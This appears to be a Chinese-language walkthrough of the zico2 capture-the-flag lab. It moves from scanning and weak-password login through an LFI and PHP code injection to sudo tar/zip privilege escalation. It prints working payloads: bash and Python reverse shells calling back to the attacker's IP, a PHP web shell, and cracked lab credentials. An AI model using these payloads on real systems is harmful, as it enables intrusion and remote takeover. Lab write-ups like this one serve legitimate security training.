当前位置: 首页 > news >正文

打靶日记 zico2: 1

一、探测靶机IP(进行信息收集)

主机发现

arp-scan -l

在这里插入图片描述

nmap -sS -sV -T5 -p- 192.168.10.20 -A

在这里插入图片描述

二、进行目录枚举

在这里插入图片描述

发现dbadmin目录下有个test_db.php

在这里插入图片描述

进入后发现是一个登录界面,尝试弱口令,结果是admin,一试就出

在这里插入图片描述

在这里插入图片描述

得到加密后的密码

root 653F4B285089453FE00E2AAFAC573414

zico 96781A607F4E9F5F423AC01F0DAB0EBD

在这里插入图片描述

hash-identifier

可能为md5加密

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

得到密码

root 34kroot34

zico zico2215@

三、进入网页

在这里插入图片描述

把所有能点的都去看一下

在这里插入图片描述

看到等于号就测
在这里插入图片描述

发现目录遍历

在这里插入图片描述

dirsearch -u http://192.168.10.20

在这里插入图片描述

nikto -h http://192.168.10.20

在这里插入图片描述

还发现一个imp目录

在这里插入图片描述

/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.

发现一个wp-config.php,这个文件一般可能存在账号密码

尝试利用php伪协议来进行利用

http://192.168.10.20/view.php?page=php://filter/read=convert.base64-encode/resource=wp-config.php%23
#尝试其他file://
http://192.168.10.20/view.php?page=file:///var/www/html/wp-config.php
http://192.168.10.20/view.php?page=php://filter/resource=wp-config.php.bak

这些尝试均失败,https://www.exploit-db.com/exploits/24044漏洞利用方法

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.11/6666 0>&1'");?>

在这里插入图片描述

在这里插入图片描述

Type类型改为文本文档,可以看到上传成功,并结合前面的目录遍历进行反弹shell

在这里插入图片描述

http://192.168.10.20/view.php?page=../../../../../usr/databases/shell.php

想直接反弹shell但是失败了

<?php echo exec('whoami'); ?>

这些都尝试了都报错了

<?php exec("/bin/sh -c 'sh -i >& /dev/tcp/192.168.10.11/6666 0>&1'"); ?>
<?php system("/bin/sh -c 'sh -i >& /dev/tcp/192.168.10.11/6666 0>&1'"); ?>

那就拼接

<?php echo system($_GET["cmd"]); ?>
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
http://192.168.10.20/view.php?page=../../../../../usr/databases/shell.php&cmd=whoami

在这里插入图片描述

http://192.168.10.20/view.php?page=../../../../../usr/databases/shell.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

成功getshell,但是还是不清楚为什么前面不能直接getshell,后面看了配置信息,exec和system函数也没有被禁用

一开始的有可能是因为

  1. 命令中转义符号处理不当>&被PHP或Shell错误解析)。

  2. 目标系统Bash的 /dev/tcp 特性被禁用,导致TCP重定向失败。

  3. PHP执行环境权限不足,无法建立网络连接。

改用 system($_GET["cmd"]) 并通过Python反弹Shell成功,是因为:

  • 绕过符号转义问题:通过URL参数传递命令,避免PHP字符串解析干扰。

  • Python的可靠性:Python的 subprocesssocket 模块更稳定且不受 /dev/tcp 限制。

  • 动态执行绕过限制$_GET["cmd"] 可能绕过某些静态代码检测机制。

在这里插入图片描述

四、提权

建立交互式终端

python -c "import pty; pty.spawn('/bin/bash');"

进去查看一下wp-config.php有没有密码

find / -name "wp-config.php" 2>/dev/null

在这里插入图片描述

zico

sWfCsfJSPV9H3AmQzw8

find / -perm -4000 -print 2>/dev/null

在这里插入图片描述

有su命令可以切换用户

在这里插入图片描述

在这里插入图片描述

先查看历史命令,可以看到这里是利用过公钥私钥,还有sudo命令的利用,编辑过to_do文档

在这里插入图片描述

cat to_do.txt

在这里插入图片描述

sudo -l

在这里插入图片描述

方法一

https://gtfobins.github.io/gtfobins/tar/#sudo

在这里插入图片描述

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

在这里插入图片描述

成功提权

方法二

https://gtfobins.github.io/gtfobins/zip/#sudo

在这里插入图片描述

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

在这里插入图片描述

flag

在这里插入图片描述

当然还可以进行脏牛提权

相关文章:

  • Pandas数据合并与重塑
  • 2025.04.19-阿里淘天春招算法岗笔试-第一题
  • 《Android 应用开发基础教程》——第二章:Activity 与生命周期详解
  • MATLAB 控制系统设计与仿真 - 38
  • ACM ICPC算法基础包括哪几类
  • Git命令归纳
  • 国产之光DeepSeek架构理解与应用分析04
  • 43.[前端开发-JavaScript高级]Day08-ES6-模板字符串-展开运算符-ES7~ES11
  • 免费多平台运行器,手机畅玩经典主机大作
  • 一个改善Entity Framework异常处理和错误信息的开源项目
  • 网络--应用层自定义协议与序列化
  • 捋一遍Leetcode【hot100】的二叉树专题
  • leetcode0113. 路径总和 II - medium
  • 6.8 Python定时任务实战:APScheduler+Cron实现每日/每周自动化调度
  • 重读《人件》Peopleware -(7)Ⅰ管理人力资源Ⅵ-莱特瑞尔 Laetrile
  • 3. 在 2节的基础上 ,实现launch文件简单编写
  • 遨游科普:防爆平板是指什么?有哪些应用场景?
  • 【EDA软件】【设计约束和分析操作方法】
  • ai学习中收藏网址【1】
  • Python学习之Seaborn
  • 甘肃古浪县发生3.0级地震,未接到人员伤亡和财产损失报告
  • 文理医工“四轮驱动”,复旦六大新工科创新学院核心团队均亮相
  • 海口市美兰区委副书记、区长吴升娇去世,终年41岁
  • 在历史上遭到起诉的杀人动物记录中,为什么猪如此普遍?
  • 商务部:对原产于日本的进口电解电容器纸继续征收反倾销税
  • 英国称担忧中国无人机拍摄英国重要基建高清图像,外交部回应